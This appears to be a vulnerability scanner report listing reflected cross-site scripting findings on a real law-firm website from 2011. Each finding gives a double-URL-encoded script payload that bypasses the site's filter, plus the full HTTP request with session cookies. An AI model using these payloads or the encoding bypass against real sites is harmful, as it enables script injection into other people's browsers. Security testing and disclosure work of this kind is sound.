<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d was submitted in the REST URL parameter 2. This input was echoed as d428a"><script>alert(1)</script>229db4da92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/jquery.jsd428a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e229db4da92d HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24 was submitted in the REST URL parameter 1. This input was echoed as a0519"><script>alert(1)</script>056a75bdc24 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsa0519%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e056a75bdc24/menu.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 was submitted in the REST URL parameter 2. This input was echoed as 72b32"><script>alert(1)</script>99218231cb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/menu.js72b32%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e99218231cb0 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc was submitted in the REST URL parameter 1. This input was echoed as 651f5"><script>alert(1)</script>51a543addfc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js651f5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e51a543addfc/script.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c was submitted in the REST URL parameter 2. This input was echoed as a9d57"><script>alert(1)</script>6a7d4ade41c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/script.jsa9d57%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6a7d4ade41c HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079 was submitted in the REST URL parameter 1. This input was echoed as 2bbc8"><script>alert(1)</script>5280505d079 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js2bbc8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5280505d079/ui.core.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 was submitted in the REST URL parameter 2. This input was echoed as 79a0d"><script>alert(1)</script>713c91dcce2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.core.js79a0d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e713c91dcce2 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d was submitted in the REST URL parameter 1. This input was echoed as 33f74"><script>alert(1)</script>75df592a80d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js33f74%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e75df592a80d/ui.datepicker.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea was submitted in the REST URL parameter 2. This input was echoed as 29ad5"><script>alert(1)</script>e294e4483ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:37 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1 Host: www.wileyrein.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
